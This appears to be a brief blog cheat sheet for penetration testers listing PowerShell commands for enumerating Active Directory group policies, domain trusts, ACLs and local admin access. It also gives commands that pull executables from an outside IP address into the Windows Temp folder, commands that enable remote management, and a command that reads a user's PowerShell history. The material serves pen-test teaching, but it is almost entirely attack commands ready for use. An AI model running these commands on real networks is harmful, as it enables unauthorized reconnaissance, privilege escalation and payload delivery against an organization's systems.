Group Policy Enumeration: Active Directory
RFS
Introduction to Active Directory enumeration with PowerShell for pen-testers. Understand how to start enumerating a Domain Controller and escalate your privileges inside the network.
GROUP POLICY (GPO) ENUMERATION
Get-NetGPO -ComputerName client-02.rfs.lab
Find-GPOComputerAdmin –Computername client-02.rfs.lab
Find-GPOLocation -UserName Rfs
Get-NetOU
Enumerate Domain trusts
Get-NetDomainTrust
Get-NetForest
Get-NetForest -Forest rfs.lab
Get-NetForestDomain
Get-NetForestCatalog
Get-NetForestTrust
ACLs Enumeration
Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"
Enumerating Users
Find-LocalAdminAccess
Invoke-EnumerateLocalAdmin
Invoke-UserHunter
Invoke-UserHunter -UserName "rfs"
Invoke-UserHunter -CheckAccess
Download Files
(New-Object Net.WebClient).DownloadFile("http://10.10.39.96:80/taskkill.exe","C:\Windows\Temp\rfs.exe")
Invoke WebRequest
Invoke-WebRequest "http://10.10.39.96:80/rfs.exe" -OutFile "rfs.exe"
Windows Remote Management WinRM
enable-psremoting -force Enable-PSRemoting
PowerShell History
Get-Content C:\Users<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Subscribe to my newsletter
Read articles from RFS directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
RFS
RFS
Connected since 1996!